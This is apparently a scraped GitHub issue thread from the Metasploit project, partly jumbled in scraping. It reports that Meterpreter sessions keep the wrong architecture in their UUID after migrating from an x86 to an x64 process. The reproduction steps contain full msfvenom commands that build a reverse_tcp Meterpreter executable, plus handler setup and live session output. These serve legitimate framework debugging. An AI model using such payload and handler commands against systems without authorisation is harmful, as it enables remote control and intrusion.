hdm
commented
7 years ago Thanks @OJ! One last item:
- Make sure the session object & database record have the new arch stored as well.
Open OJ opened 7 years ago
hdm
commented
7 years ago Thanks @OJ! One last item:
justinsteven
commented
7 years ago 1 Set up a reverse_* handler of some kind (I used to reverse_https) that's x86 and has ExitOnSession set to false. Kick it off with run -j.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 172.17.24.1
LHOST => 172.17.24.1
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.2 Create a matching payload/binary.
14:56:52[justin@diablo ~/opt/metasploit-framework](r7_master)% ./msfvenom -p windows/meterpret
er/reverse_tcp LHOST=172.17.24.1 LPORT=4444 -f exe -o $MYDIR/m.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /tmp/tmp.Z6yDC8gVUx/m.exe3 Execute the payload/binary on an x64 system, get a session.
4 Check to make sure sysinfo says Meterpreter : x86/win32.
meterpreter > sysinfo
Computer : YUFFIE
OS : Windows 10 (Build 10586).
Architecture : x64 (Current Process is WOW64)
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win325 Run uuid to see the current UUID details
meterpreter > uuid
[+] UUID: 169e202616763839/x86=1/windows=1/2016-09-14T04:59:17Z6 Migrate the session to an x64 process.
meterpreter > migrate 228
[*] Migrating from 2348 to 228...
[*] Migration completed successfully.7 Run sysinfo again and notice it changes to Meterpreter : x64/win64.
meterpreter > sysinfo
Computer : YUFFIE
OS : Windows 10 (Build 10586).
Architecture : x64
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/win648 Run uuid and notice that the architecture returned is still x86=1/windows=1 as it was before.
meterpreter > uuid
[+] UUID: 169e202616763839/x86=1/windows=1/2016-09-14T04:59:17Z9 Put the session to sleep for 1 second using sleep 1.
10 Wait for the session to come back, and interact with it.
meterpreter > sleep 1
[*] Telling the target instance to sleep for 1 seconds ...
[+] Target instance has gone to sleep, terminating current session.
[*] 172.17.24.133 - Meterpreter session 1 closed. Reason: User exit
msf exploit(handler) >
[*] Sending stage (957999 bytes) to 172.17.24.133
[*] Meterpreter session 2 opened (172.17.24.1:4444 -> 172.17.24.133:1598) at 2016-09-14 15:00:
39 +1000
msf exploit(handler) > sessions -i 211 Run sysinfo again and notice that we now have Meterpreter : x86/win32 again.
meterpreter > sysinfo
Computer : YUFFIE
OS : Windows 10 (Build 10586).
Architecture : x64
System Language : en_AU
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/win3212 Run uuid and we still have the same details.
meterpreter > uuid
[+] UUID: 169e202616763839/x86=1/windows=1/2016-09-14T04:59:17ZIf the user loads an extension at this point, they will see crashing happening as x86 binaries are thrown at x64 sessions.
meterpreter > use kiwi
Loading extension kiwi...
[-] Failed to load extension: No response was received to the core_loadlib request.And notepad.exe (the process I migrated to) crashes.
OJ
commented
7 years ago Thank you @justinsteven for the testing :)
OJ
commented
4 years ago @ccondon-r7 I'm thinking that this is no longer an issue, but we should test it nonetheless. There's a UUID sharing step that goes on (I believe) behind the scenes on session startup now so I think we're ok. But yeah, needs to be validated before we close it.
Once a Meterpreter session has been established back to MSF, it's possible to migrate from one process to another, as we know.
Unfortunately there's a small issue where during or after migration, no steps are taken to make sure that the new architecture of the session is tracked. Ideally, we should update the UUID of the session to match the new architecture, but we don't.
This doesn't prove to be an issue while using an established session that has been migrated from one arch to another, but it does cause issues when that session is put to sleep/split and then returns to MSF.
When MSF gets the session coming back, it believes it to be the same as the original architecture, even if it's no longer then case thanks to migrating. I'm not sure yet if this is just down to the fact that we don't update the UUID when migrating, or whether our handlers are not correctly checking the UUID in stageless connections once they've come back in. I think we should be doing both.
Steps to reproduce
reverse_*handler of some kind (I used toreverse_https) that's x86 and hasExitOnSessionset tofalse. Kick it off withrun -j.sysinfosaysMeterpreter : x86/win32.uuidto see the current UUID detailssysinfoagain and notice it changes toMeterpreter : x64/win64.uuidand notice that the architecture returned is stillx86=1/windows=1as it was before.sleep 1.sysinfoagain and notice that we now haveMeterpreter : x86/win32again.uuidand we still have the same details.At this point we have mixed architecture things going on, which can result in bad things happening. If the user loads an extension at this point, they will see crashing happening as x86 binaries are thrown at x64 sessions.
Suggested approach
I think we should:
If in doubt, we should always ask Meterp instead of trying to keep track of it at the MSF side.
Ping @hdm and @busterb since we chatted on IRC about it.
Thanks!